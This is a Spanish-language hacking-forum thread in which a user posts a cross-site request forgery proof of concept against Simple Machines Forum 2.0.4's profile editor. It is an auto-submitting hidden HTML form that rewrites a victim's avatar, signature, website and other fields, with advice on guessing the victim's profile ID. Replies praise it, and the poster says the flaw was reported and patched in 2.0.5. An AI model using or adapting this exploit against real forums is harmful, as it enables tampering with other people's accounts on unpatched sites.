[CSRF] [SMF] Cambiar perfil

Réplica1 · Agosto 26, 2013, 08:12:44 PM

Hoy os traigo un csrf en SMF.

Esto es importante, en la ultima linea:

Código: text

<input type="hidden" name="u" value="94">

En value, donde pone '94' ahí que poner el numero de perfil de la victima es tan fácil como ir a tu perfil y ir cambiando el ultimo numero asta que encuentres su perfil.

Código: php

<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://foro.com/foro/index.php?action=profile;area=forumprofile" method=post name="csrf1">
<input type="hidden" name="avatar_choice" value="none">
<input type="hidden" name="personal_text" value="P3K4D0R">
<input type="hidden" name="bday3" value="6666">
<input type="hidden" name="bday1" value="01">
<input type="hidden" name="bday2" value="12">
<input type="hidden" name="location" value="Mongolia">
<input type="hidden" name="msn" value="[email protected]">
<input type="hidden" name="usertitle" value="Pekador">
<input type="hidden" name="signature" value="Underc0de">
<input type="hidden" name="website_title" value="Underc0de">
<input type="hidden" name="website_url" value="Underc0de.org">
<input type="hidden" name="button_submit" value="Cambiar perfil">
<input type="hidden" name="u" value="94">
<body onload="envio_csrf()">

Reportado: Sí, y fixeado en todas las versiones.

ANTRAX · Agosto 26, 2013, 08:59:53 PM

Muy bueno!
A que versiones de SMF afecta?

Saludos!
ANTRAX

Réplica1 · Agosto 26, 2013, 09:09:01 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Muy bueno!
A que versiones de SMF afecta?

Saludos!
ANTRAX

Afectava a la 2.0.4, pero al reportarla la fixearon a las horas y con algunas fallas mas sacaron la 2.0.5.

Ahora para verificar al aceptar usa tu pass y user encryptados en md5 si no me equivoco y se tendria que tener el user y pass, y no tendria sentido ya que tendrias la cuenta y puedes hacerlo manualmente.

- Saludos;)

ANTRAX · Agosto 26, 2013, 09:58:47 PM

Genial! muchas gracias! Siempre hay foros que no actualizan por que no estan muy bien mantenidos..!

Saludos!
ANTRAX

ZanGetsu · Agosto 26, 2013, 10:17:31 PM

esta muy bueno amigo, muchas gracias !

Réplica1 · Agosto 26, 2013, 10:42:01 PM

Muchas gracias por comentar, mañana publicare todos los csrf de foros miarroba que tengo y son bastantes!

Saludos

[CSRF] [SMF] Cambiar perfil

Réplica1

Agosto 26, 2013, 08:12:44 PM

ANTRAX

Agosto 26, 2013, 08:59:53 PM #1

Réplica1

Agosto 26, 2013, 09:09:01 PM #2 Ultima modificación: Agosto 26, 2013, 09:13:17 PM por xPekador

ANTRAX

Agosto 26, 2013, 09:58:47 PM #3

ZanGetsu

Agosto 26, 2013, 10:17:31 PM #4

Réplica1

Agosto 26, 2013, 10:42:01 PM #5